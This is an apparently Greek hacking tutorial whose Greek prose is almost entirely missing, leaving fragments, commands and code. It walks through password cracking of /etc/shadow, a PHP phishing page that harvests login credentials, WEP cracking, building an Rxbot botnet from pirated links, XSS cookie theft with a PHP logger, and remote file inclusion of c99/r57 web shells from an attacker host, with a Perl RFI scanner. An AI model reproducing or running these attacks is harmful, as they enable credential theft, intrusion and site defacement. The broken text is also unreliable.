
tutorial hacking

Computer Science is no more about computers than astronomy is about telescopes


Edsger W. Dijkstra

by Thanasaras!

Hacker;
, ,
,
, -
ARPAnet .
'hacker'. hackers
internet. hackers Unix
. hackers
Usenet. hackers .
,
hacker, hacker.

hacker
hacker .
hacker , - ,
.
hackers
'hackers' -
hacker
hackers.
hacker .
hackers,
. ( )

(Black Hat Hackers). hackers
'crackers'
. hackers
crackers , , ,
hacker,

. ,
'hacker'
'crackers'.
hackers.

: hackers ,
crackers .
, 'cracking'
.

'hacker', ,
'' .
Eric Steven Raymond

hacker,
1960, 1980 .
.
!
.
hackers phonefreaks.

.
. http://www.youtube.com/watch?v=u18BAZjUHhE .
hacker,
hacking.

5 hackers

hackers

.
.
1. Kevin Mitnick
Mitnick hacker.
..
"
...".
Hollywood
, Takedown Freedom
Downtime. Mitnick ""
Los Angeles
.

Digital Equipment Corporation
software.
Mitnick , ,
.

hacker, Tsutomu Shimomura. Mitnick

, .
2. Adrian Lamo
Lamo hackers
"" Microsoft New York Times.
Lamo internet
,
" hacker".
Lamo , Yahoo!, Citigroup, Bank of
America Cingular, White Hat Hackers

Lamo
New
York Times. Lamo
.

3. Jonathan James
16 James,
.
. James
""

e-mail. James
NASA software
1,7 . . James
.
4. Robert Tappan Morris
Morris NSA Morris
worm. To worm -
. worm
internet. Morris
Cornell
internet .
worm
Morris
400 . o Morris
MIT Computer Science
.
5. Kevin Poulsen
, Dark Dante, Kevin Poulsen

KISS-FM Los Angeles
Porsche. FBI
Poulsen
.

.
,
Wired News.
hackers ..

hackers
!

hackers,
hackers 3 :

Grey Hat Hackers


Grey hat hackers ""
,

"". Anonymous,
Greek Hacking Scene.
Black Hat Hackers

, .
, .
hackers,
, .

White Hat Hackers


, ,
.
,
. .
,
. (
. .).

Hacker.
hacker, "" ,

. , Hacker
.

. ,

URL
. Acunetix vulnerability scanner.
,
,
Hacker,
"", .
SQL Injection ( ) Havij 1.15.

Hacking:

O
hacker.
Python. Eric
Steven Raymond Python , ,
.
, .
projects. Python
tutorial
site Python.
tutorials, Youtube(http://www.youtube.com/watch?
v=4Mf0h3HphEA).
hacker Perl,
C( C++) Lisp'',
Python. HTML
.

Browser (). html
.
html .

Hacking: Unix

.
hacking,
Linux . ,
Unix.
-
.
hacking Microsoft Windows
,
.
Unix Internet.
, "
Windows.
, ,
Windows, .
Internet
Unix, Internet hacker Unix.
, hacker
Unix. ( ,
hackers ,
Unix Internet
Microsoft .)
, linux multitasking,

.
ubuntu (
ubuntu linux).
dvd
boot tray (CD/DVD Drive). ,

Linux.

,
.
.
Journal ext 3 ( )
SWAP ( )
P/C
.
- ,

root.

.
, 45 1h:15
, P/C, DVD
.

user ,
().

Deface
Deface
.
Deface (Greek Hacking Scene -GHS),
, ,
.
Passwords -
,
site .
hacker
.

Password Cracking
Social Engineering
.
,


.
.

.

" ",

.
:

hacker .

-hacker: < > , <


> software service.

.
()
?!
.
hacker
.
Dictionary Attacks hacker
(wordlist)
.
Hydra.
Hydra,
.
ftp(File Transfer Protocol) server
server (..Ftp.tripod.com), (.. Ftp,
) ( 21).

Passwords,

.

.
Start
password.
Start
,

.
Brute-force Attacks

. Brute-force ,
( ),
( )
.

John the Ripper ( )
password cracker, Unix-like,
Windows, BeOS OpenVMS. John The Ripper
"" password
, "" . ,
password
. ""
password !

-
,
GNU/linux i686.
1. directory Shell
,
. $ cd /var/tmp
2. John The Ripper
. $ wget http://www.openwall.com/john/b/john-1.6.tar.gz
3. John The Ripper
. $ tar xzvpf john-1.6.tar.gz
4. directory "" John The Ripper
. $ cd john-1.6/src
5. root
. $ su
...
. # make linux-x86-mmx-elf
( ubuntu-, 5 sudo make
linux-x86-
mmx-elf!)
6. directory
. # cd ../run/

hash
/etc/passwd /etc/shadow passwords.
....
# ./unshadow /etc/passwd /etc/shadow > passwords
, , bruteforce
.
...
# ./john passwords

.
# ./john
...
user "test"! password "secret"!
John The Ripper password

.
1. # adduser test
2. # passwd test [secret]
3. # ./unshadow /etc/passwd /etc/shadow > passwords
4. # ./john -i:alpha passwords
Loaded 4 passwords with 4 different salts...........
password "secret" user
"test"!

"" CTRL+C.

# ./john -restore
, ""
password ...
# ./john -show passwords
test:secret:502:502: /home/test:/bin/bash
1 password cracked, 3 left
""
# userdel test

Rainbow Tables ' rainbow table Hash


. Hash

.
hash ( ) .
hash
MD5 web sites.
site,
MD5 hash site.
site hash
MD5 hash
site, , site
.
hash, hash

brute-force dictionary.
.
rainbow table cracking
Windows Password Hacking.

Domain names
""
domain names.
.
Facebook, ""
Facebook.com( 15 ).
Facebook domain name .com top level domain
tld. Internet Assigned Numbers Authority (IANA)
top-level domains top level domain
tld( ).
,
2 . .. .gr, .fr, .cn, .tr, .co.uk(. ) .
top level domains tld top level domain tld
cc.
2 .
( 3 ) . gov , .org , .mil , .com ...
top level domain gTLD.
top-level domains,
arpa.
blogs. blogs
. H
mysite.gr, blogs
.

mysite.blogspot.com.
blogspot.com. blogs
, "" .
hackers blog
. ""
blog
, HTML.

Defaces. blogs
"powerade by google", Google .
"" blog,
Google.

Phishing hacking
Phishing.

hackers
.
rapidshare.com .
site http://www.rapidshare.com
premium zone.
.
.
: method action.
(ctrl+F) method.
method=post post
get.
action
:
action=https://ssl.rapidshare.com/cgi-bin/premiumzone.cgi
next.php :
action=next.php
index.html
next.php.

:
:

<?php
$datum = date(d-m-Y / H:i:s);
$ip = $_SERVER['REMOTE_ADDR'];
header(Location: redirect url);
$handle = fopen(password.txt, a);
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, =);
fwrite($handle, $value);
fwrite($handle, \r\n);
}
fwrite($handle, IP: $ip | Date: $datum (Date=0 GTM)\r\n);
fwrite($handle, \r\n);
fclose($handle);
setcookie (user, empty, time()+3600);
exit;
?>

next.php

.
location redirect url
rapidshare

.
rapidshare. :
header(Location: https://ssl.rapidshare.com/cgi-bin/premiumzone.cgi );
next.php
password.txt

.
free web hosting site php (
http://www.freeweb7.com/)
default web hosting provider
index.html 3
(index.html,next.php,password.txt).
test
login test password
password.txt.
.
...
- Cain and Abel ( ).
- SolarWinds
- Rainbow Crack ( , GB
).
- Brutus ( FTP).

Network Hacking
Footprinting
.


.
?
;

.
:
,emails,,
.
.
.


.
Domain Names Network Blocks;
Domain Names
IP's .
:
query whois
register domains.
www.ripe.net
5 queries
whois
. queries : registrar query,o organizational
query, domain query, network query point of contact query.
:

www.networksolutions.com
query whois
site domain MARFININVESTMENTGROUP.COM
:
Domain Name: MARFININVESTMENTGROUP.COM
Registrar: ONLINENIC, INC.
Whois Server: whois.onlinenic.com
Referral URL: http://www.OnlineNIC.com
Name Server: NS.MARFINBANK.GR
Name Server: NS1.MARFINGROUP.GR
Status: clientTransferProhibited
Updated Date: 26-feb-2011
Creation Date: 10-may-2007
Expiration Date: 10-may-2010

:

. IP
.
www.ripe.net :

,,fax,
network blocks!!! tool
IP
alive. nslookup cmd
hostnames IP
.
Footprinting
.

.

Port Scanning hacker


( 90%) ports
.
, ""
,
. nmap
(Zenmap).
hacker (URL IP)
target box. command box .
hacker profile scan.
hacker scan
.

scan :
(H IP 50.22.11.20, eimaimalakas.com)

NetBIOS Hacking.
port 139,
netbios hacking.
. angry IP scanner ,

.
, ,
. ;
tools>preferences>ports
.
, (
.)

,
, .
,
139 ,
. 139
! !
cmd(command). cmd
enter, :

1): nbtstat -a (here the ip)

2) : net view \\(IP here)

3) : net use R: \\(IP here)\C

; 90% ( )
" "(Win+E) (!)
. (C:/) !!
ports ,
ports.
20 FTP data (File Transfer Protocol)
21 FTP (File Transfer Protocol)
22 SSH (Secure Shell)
23 Telnet
25 SMTP (Send Mail Transfer Protocol)
43 whois
53 DNS (Domain Name Service)
68 DHCP (Dynamic Host Control Protocol)
80 HTTP (HyperText Transfer Protocol)
110 POP3 (Post Office Protocol, version 3)
137 NetBIOS-ns
138 NetBIOS-dgm
139 NetBIOS
143 IMAP (Internet Message Access Protocol)
161 SNMP (Simple Network Management Protocol)
194 IRC (Internet Relay Chat)
220 IMAP3 (Internet Message Access Protocol 3)
443 SSL (Secure Socket Layer)
445 SMB (NetBIOS over TCP)
1352 Lotus Notes
1433 Microsoft SQL Server
1521 Oracle SQL
2049 NFS (Network File System)
3306 MYSQL
4000 ICQ
5800 VNC
5900 VNC
8080 HTTP

ports hacker
,
nMap
, .
"site" 404 error
site
error. 404
error (ghfhgfhfh.php)
. .. Www.target-site.com/ghfhgfhfh.php
nMap

(http://nmap.org/book/man.html)

Searching for Vulnerabilities hacker


,
exploit. exploit
.
exploit port
.
databases exploits :
http://exploit-db.com/
http://packetstormsecurity.org/
http://osvdb.org/
0-Day: Vulnerability () hacker
0-day (zero day). 0-day Vulnerabilities
hacker
site
.

Adobe Reader,
, hacker
.
vulnerabilities :

1. Denial Of Service (DoS)


-
bandwidth
.
(data packets)
-
(reboot).
. .
.
,
enter.
.
, .
,
; ,
( ),
, !
DDoS (Distributed denial of service), ,

.

2. Buffer Overflow (BoF)


hackers
login.
.
,

.
,

(buffer) ,
.

process stack,
.
(function)
,
process stack
,
( root access).

3. Local Exploit exploit Local,


exploit.
4. Remote Exploit exploit remote,

(
RFI{Remote File Inclusion}).
Penetrating , hacker
exploit ?!

exploit . exploit
.
exploit Perl.

exploit , Perl.
sudo apt-get install perl .
exploit
IP . '
exploit,
directory ,
cd /directory exploit/
.. Cd /home/Desktop/ exploit
perl --exploit.pl
. exploit
, pl Perl.

Wireless Hacking
Wep Cracking Backtrack.
. iwconfig
(
eth1) ,
. , BackTrack,
Radio Network Analysis, 80211, All ,
Kismet.
kismet monitor, ,
...
s c
channel . m
( !!).
L ( L . shift+L) kismet
. enter ssid, bssid channel.
q , Q kismet.
,
airodump-ng eth1 --ivs -w capture --bssid ff:ff:ff:ff:ff:f1 --channel 1
enter, eth1 iwconfig, ff:ff:ff:ff:ff:f1
bssid kismet, (channel) 1
kismet, capture
, airodump-ng ... --ivs
(capture.ivs) -w, ""
P bssid ff:ff:ff:ff:ff:f1, .
64bit 50k 200k ,
128bit 200k 700k!! ,
. .
. airodump-ng,
, aireplay-ng eth1 -a ff:ff:ff:ff:ff:f1
--deauth 0 enter eth1 iwconfig,
ff:ff:ff:ff:ff:f1 bssid kismet,
aireplay-ng ... --deauth 0 AP clients.

. -c ff:ff:ff:ff:ff:f2
--deauth, ff:ff:ff:ff:ff:f2 mac client ( kismet),
0 .
,
clients . ctrl+c
deauth. , aireplay-ng eth1 -b ff:ff:ff:ff:ff:f1 -m 68 - n 68 -h
ff:ff:ff:ff:ff:ff --arpreplay ff:ff:ff:ff:ff:f1 bssid
kismet, :
( capture), AP
,
, , .
"(got 1 ARP requests), sent ##
packets...". airodump .
airplay airodump .
... ,
aircrack-ng -f 2 -b ff:ff:ff:ff:ff:f1 -n 128 -q capture*.ivs enter
ff:ff:ff:ff:ff:f1 bssid kismet,
, 128 bit (64/128/256/512), capture
airodump.
airocrack-ng -f 2,
airodump . aircrack
. linux,
airodump, aircrack, aireplay kismet .
.
? WPA . WPA ,
passphrase , s1g@mhnm3vre1p0t3k@n3n45p4p4r@5

. , how to.
,
ivs, brute force ,
, .
youtube
http://www.youtube.com/watch?v=owazIVWp-rc .

Packet Sniffing
.
Wireshark. packet sniffer hacker
, username password
. Wireshark.
capture interfaces.

start.

Windows Live Messenger


.

Windows Hacking
Ophcrack, Ophcrack.
Load Encrypted SAM
,
windows.
system32 config
.../WINDOWS/system32/config.
config
Ophcrack windows
Hash.
Administrator NT
Hash ( ).


Hash, hash.
)
(
) )
online server Hash.
, site
o hash
(http://www.md5decrypter.co.uk/ntlm-decrypt.aspx).
hash )

.

hash site (http://www.md5decrypter.co.uk/contact-
me.aspx) rainbow tables.
: O ADMIN
...

Malware
Malware,
malicious software,

. (
) , .

Virus
.
, , .
,
. ,
o ,
, (
-
).

Trojan horse( ) Backdoor


, ,
backdoor. ,
, - ,
,
.

Worm

. ,
.

Spyware

.
spyware,
, (
usernames passwords sites), ,
, keyloggers.
, keyloggers,
RAT(Remote Administrator Tool),
.
Cybergate, ProRAT, DarkComet.
Adwares


, .
bandwidth internet,
,
.

Crypters
"" ()
(antivirus)
.

Botnet botnet
. botnet bots


.
botnet
.
H botnet
keyloging, capture screen
shots, , cd keys,
, ddos ,
, botnet
.
. C
compiler
1.K Mcft Visual C 6.0 Standard edition
http://anonym.to/?http://www.megaupload.com/?d=SUHPYZRX

http://anonym.to/?http://rapidshare.com/files/21861555/msc__.rar.html
: itzforblitz
Serial: 812-2224558
2. setup.exe .
3. Service Pack 6
http://anonym.to/?http://www.microsoft.com/downloads/details.aspx ?
familyid=a8494edb-2e89-4676-a16a-5c5477cb9713&displaylang=en
4. Windows Platform SDK
http://anonym.to/?http://rapidshare.com/files/21854411/sdk.rar.html

http://anonym.to/?http://www.megaupload.com/?d=YH3SS78I
: itzforblitz

/bot .
1. Mcft Visual C Compiler 6.0
2. tools-> options directories
3. directories,
.
C:\PROGRAM FILES\MICROSOFT PLATFORM SDK
C:\PROGRAM FILES\MICROSOFT PLATFORM SDK\INCLUDE
C:\PROGRAM FILES\MICROSOFT PLATFORM SDK\LIB
C:\PROGRAM FILES\MICROSOFT PLATFORM SDK\SRC
C:\PROGRAM FILES\MICROSOFT PLATFORM SDK\BIN
C:\Program Files\Microsoft Visual Studio\VC98\INCLUDE
C:\Program Files\Microsoft Visual Studio\VC98\MFC\INCLUDE
C:\Program Files\Microsoft Visual Studio\VC98\ATL\INCLUDE

bot .
http://anonym.to/?http://www.mediafire.com/?awmwyidzjz5

http://anonym.to/?
http://rapidshare.com/files/21854222/botsrc7.6rx.rar.html
2.
folder : Rxbot 7.6
3. Rxbot 7.6 config.h
. :
int port = ; //server port
char password[] = " "; // bot, '' ''
char server[] = " "; // irc botnet
char channel[] = "# "; // bots
char chanpass[] = " "; // .
bot
char exploitchan[] = "# "; // exploit

char keylogchan[] = "# "; // keylog

char psniffchan[] = "# "; // psniff

config file
. ; !!!
1. Mcft Visual 6.0
2. File -> Open Workspace
3. browse Rxbot 7.6 folder rbot.dsw
4. ''rbot files'' -> build
( )

5.O Rbot.exe Rxbot 7.6 > Debug folder !


!!!! !!!
botakia
irc !
bots. .
.
http://anonym.to/?http://rapidshare.com/files/21542921/cmands.html
mirc irc
:
http://mirc.com/
T tutorial
bots ,
botnet public

botnet . bots
secret mode. key.
m ,
moderated, flood server .

botnet , torrents
trackers mininova piratebay,
chatrooms, , internet cafe, warez
,
. public
botnet dalnet, undernet, efnet.

!

Web Hacking
Cross Site Scripting (xss)
(2-3 ) XSS
, , ' ,
webbased , web
developers ..
,
. ,
XSS attacks
.
XSS attacks;
CSS (Cross-Site Scripting)
attacker (inject)
.
, , '
.

client server,
server, client side
scripts javascript Netscape.

XSS .
Xss (Cross Site Scripting),
site
.
(http://tinyurl.com/yxzaoj ). , ,
,
XSS.
. ,
, , . , ,
: , security experts
XSS . , sites
XSS ,
.
;
.
,

.
XSS, ,
site
. , , .
, ,
site .

: internet
stateless. .. . ;
browser server, ( server)
! (built-in)

.
, :
site. ;
, nick password server
. . . ..

. . Ok.. !
site ,
(nick password)
,
links server .
,
link server,
! stateless,
( )
server (http://tinyurl.com/fwghj).
, , server , -
, (nick password)
( ..
);
.
forum.
server.
, ! server
, ,
stateless; ;
,.. .. PC !
cookies , .
, ,
internet browser ,
sites, server .
. . ,
( ), , ;
.. ! ( !!). , sites forums,
server
. ,
,
, server
. cookies session cookies,
. . ,
internet browser session.
.. ,
cookies browser: ,
site !
(impersonation). .
site
impersonation.
cookies ()
.

cookies
PC .
;
.
XSS. , o
java (javascript) internet browser,
site .
;

. , site
1
. ,
javascript
server. javascript, (
)
Hello Total Hacker.
:

<script>alert("Hello Total Hacker!!");</script>

server
. ( )
server ,
.
:

2: To server
XSS.
javascript .
cookies user,...
. :
<script>alert(document.cookie)</script>

cookies server ( 3).
.
cookies. , ,
( , )
javascript URL.
:
>
internet browser ,
cookies .
cookies
... ! A
( cookies ) 2
:
1: PC
.
2: cookies
,
!

3: cookies server.
1
.
: phishing
(http://tinyurl.com/48zm2). url
link . ,

... : ... ...
! URL mail link
server .
,
.
!
.
... (
... !!).
URL link
cookies (
2).
javascript XSS (
) link (redirection).
XSS
redirection. 2:
redirection. link site
cookies :
redirection.
link (
Microsoft;;;). link
( link Microsoft) ,
. javascript.
javascript
Link Microsoft.
. link -
Microsoft:
2 ( ... )
4. kakoscript1.php kakoscript2.php.
!! .
(.. kakoscript2.php):
1: document.cookie ( !
).
2: navigator.userAgent ( internet browser
).
URL
site .
, , mail link

4. link
Microsoft. link
cookies , ... !

site link
site ( cookies).

4: ... link Microsoft.


2 o
!
server php. server
Free Web Hosting .
server, ,
kakoscript1.php kakoscript2.php.
kakoscript2 1. To
script cookie
internet browser ( server)
aaa.txt.
<?php
$biskotaki = $HTTP_GET_VARS["param1"]; // T. . .
$browser = $HTTP_GET_VARS["param2"]; // T
browser.
$txtfile = fopen('aaa.txt', 'a+'); // .
fwrite($txtfile, "-- biskotaki --------\n"); //
fwrite($txtfile, $biskotaki . "\n"); // .
fwrite($txtfile, $browser . "\n");
fwrite($txtfile, "------------------\n");
fclose($txtfile); // .
?> // ... !!
!
site :
site.
link ,
cookies Internet browser .
cookies
cookies ( )
site ! ,
impersonation
!! ! .
.
aaa.txt :
5: cookies.
5 session cookie.
cookies, site
! cookie
add-on firefox Web Developer Toolbar
(http://tinyurl.com/2ek6ec) ( 6)

6: cookies Web Developer


Toolbar.
... .
Opera firefox .
, site
( session cookie) browser
.
. add-on firefox User Agent Switcher
(http://tinyurl.com/48zm2)
browser ( 7).

7: User Agent Switcher


browser .
,
server, refresh ... voila
( 8)!
8: O .

... login!

, .
.
:
link .
( ) ,
. antiphishing (
IE7 built-in).
javascript. AddIn
firefox NoScript (http://tinyurl.com/yov7ar)
anti-XSS MUST!!
, internet browsers.
cookies
..., Links.
clear cookies
link.
passwords , e-
mails.
mail PIN
! e-mails
(
http://www.dart.gov.gr/)
mail.
server. O


( ) !
site .
sites
.
XSS
,
. ,
(
;;!)
.
,

!
!!

(client side) '
. phishing,

XSS .

XSS attacks:
, :
+ Type-0
phishing XSS,
email attached link
javascript
attacker.
+ Type-1
, attacker vulnerable XSS site
script spoofed email link
site script url. link
script.
+ Type-2
site forum, post link site
link url "" session
cookies site/forum
attacker.

LFI: !
,

( , ),
. ,
: , ,
. , ,
.
, , ,
,
. .
!

Remote File Inclusion (R.F.I)


deface root ,
(vulnerability).
R.F.I.
php (script) site
.
:
(
) include($title . '/archive.php'); url:
www.vulnerable.website.com/index.php?title=archive.php ?

php script ,
( permissions)
. T scripts web shells. T
web shells : c99 r57.
O :
www.vulnerable.website.com/index.php?
title=http://www.malicious.code.com/C99.txt?
archive.php
C99.txt
remote web server.
server :
www.malicious.code.com.
server
R.F.I.
& remote
.
site,
,
scanners, , ,
bots IRC Servers.
Remote File Inclusion. Remote File Inclusion
( RFI)
,
..
()!
RFI (Remote File Inclusion),
/ site PHP/ASP
shell , ( ) server. To site-,

, .
, 99.9878129% ,
!

, Remote File Inclusion..


.. ()
, ( )

!
RFI?
RFI [Remote File Inclusion] () ,
, ( )
PHP (
) website '
. site?
,
URL website. ,
, URL site
.. Shell .
Shell ?
Shell ( WebShell ) php ,asp ( Dynamic
Pages) .
site, add, edit, delete, upload .
.. ADMINISTRATOR!
RFI
? : include($page . '.php');
include () .php . :) .
site :
http://www.site.gr/i...age=example.php
. .
example.php URL
site ( ) Shell
. H include () , ,
. . voila!
http://www.site.gr/index.php?page=http://w...hel s/shel .php
( ) shell ,
*.*txt
site ! http://www.site.gr/index.php?
page=http://www.eimai_polu_kakos.gr/shel s/shel .txt ?
.
( )... !!
site
RFI ,

1

site shellaki site
. 1 shell
server! , server
( ),
Free Host shellaki ..
Google Free Hosts ..!
1
shellaki server ,
! So evil eh?
2 ()
website
. To !
(Google)
, ?

..
:
:
Vulnerable sites Google allinurl:
!
website

( ).. '
site
RFI... .....
2
.

3
website RFI
o :
site:
http://www.site.gr/i...age=example.php
example.php
server , shell , 1.
2
, site
shellaki ,
! 2,
, ( site ),
' ,
: Read, Write,
Execute Command Upload, Download, Edit, Delete ... .
,

( perl !) , site

RFI.
single_rfi.pl

1.#!/usr/bin/perl
2.
3.use LWP::UserAgent;
4.use HTTP::Request;
5.
6.print "\n(c) totalXaker magazine \n";
7.print "Simple RFI Vulnerability Scanner [mr.pr0n]\n";
8.print "Host: ";
9.print "[Ex: www.xxx.org ]:";
10.chop ($host = <STDIN>);
11.$host = "http://".$host if ($host !~ /^http:/);
12.print "Enter path:";
13.print "[Ex: xxx.php?xxx= ]:";
14.chop ($path = <STDIN>);
15.print "Shell: ";
16.print "[Ex: http://www.xxx.gr/xxxx/r57.txt? ]:";
17.chop ($shell = <STDIN>);
18.print "String: ";
19.print "[Ex: r57shell ]:";
20.chop ($string = <STDIN>);
21.{
22.$rfi=$host."/".$path.$shell;
23.$req=HTTP::Request->new(GET=>$rfi);
24.$useragent=LWP::UserAgent->new();
25.$response=$useragent->request($req);
26.if ($response->is_success) {
27. if( $response->content =~ /$string/){
28.print "$host ,is HACKABLE! :D \n";
29.print "-------------------------------------------------\n";
30.print "$rfi";
31.print "\n-------------------------------------------------\n";
32.}else{
33.print "Maybe $host is not Vulnerable!:( \n";
34.}
35.}}

:
1-5 2,3
packages . LWP::
UserAgent packages
User Agent ( )

Web. HTTP::Request http
.

6-20 6,7 .

' , ,
$host site:
http://www.site.gr
$path,
: /index.php?page=
, $shell
,
shell .
, $string ""
($host) ,
shell r57.txt ( )
r57shell shell !
21-25
H $rfi=$host."/".$path.$shell
.
23-25
, website
online! 26-35
(response) o

$string. ..
!
:

(c) totalXaker magazine


Simple RFI Vulnerability Scanner [mr.pr0n]
Host: [Ex: www.xxx.org ]:http://www.site.gr
Enter path:[Ex: xxx.php?xxx= ]:/index.php?page=
Shell: [Ex:
http://www.xxx.gr/shells/r57.txt?]:http://www.eimai_polu_kakos.gr/shells/r57.txt
?
String: [Ex: r57shell ]:r57shell
HACKABLE! :D
-------------------------------------------------
http://www.site.gr/index.php?page=http://www.eimai_polu_kakos.gr/shells/r57.txt ?
-------------------------------------------------
, .
3
. site HACKABLE ..
.

3
.. !
( ?)
site .. !

4
site , shell
- shell .
:
shell server
directory ,
default_page.php. access
site ' , administrator :)
, 4.

4
server shell ' !
administrator site,
site. ! dministrators (
uid=99(nobody)) !(! !)

Defacement site
..
defacement
, ..
,
site! To Defacement 5
( !)
!.
SQL Injection
.
( ) SQL.
, SQL URL
! .
SQL Injection.
SQL Injection.
.
.
Blind SQL Injection, Ms SQL Injection, My SQL
Injection .
mysite.gr/article.php?id=5

, .php?id=.
,
cojito, .

Part 1: google dorks


http://rapidshare.com/files/262434175/el hnikoxak_part_1.rar
Part 2: database MySQL 5
http://rapidshare.com/files/262440280/el hnikoxak_part_2.rar
Part 3: database MySQL 4
http://rapidshare.com/files/262475910/el hnikoxak_part_3.rar
Part 4: admin>Deface
http://rapidshare.com/files/262616856/el hnikoxak_part_4.rar
Part 5: database ASP MySQL injection
https://rapidshare.com/files/4270670079/__database__ASP_MySQL_injection
-part_5-.mp4
Part 6: database blind MySQL injection
https://rapidshare.com/files/326535758/__database__blind_MySQL_injection-
part_6-.mp4

: , 90%
Hashes, MD5, SHA-256 .
Hashes;

http://www.md5decrypter.co.uk/ .
. cain&abel,
. bruteforce,
dictionary rainbow tables.
(http://www.oxid.it/cain.html).
youtube.
Note: win xp /win 7 2 .

IP Internet.
proxy browser
Internet .
proxy server
.

.
cookies
, .
Web Based Proxy:
http://proxify.com/
http://htmlblock.co.uk/anonymous_web_browser/
http://www.shadowsurf.com/
http://anonymouse.org/anonwww.html
http://www.guardster.com/subscription/proxy_free.php
http://www.the-cloak.com/login.html
Web Based Proxy

,
proxy
.

...

"hacks" ,
.

Greektrack ""
,
Hacking.
Hacking , ,
, , , .

"" C4pt4in.
.

C4pl4in

!!!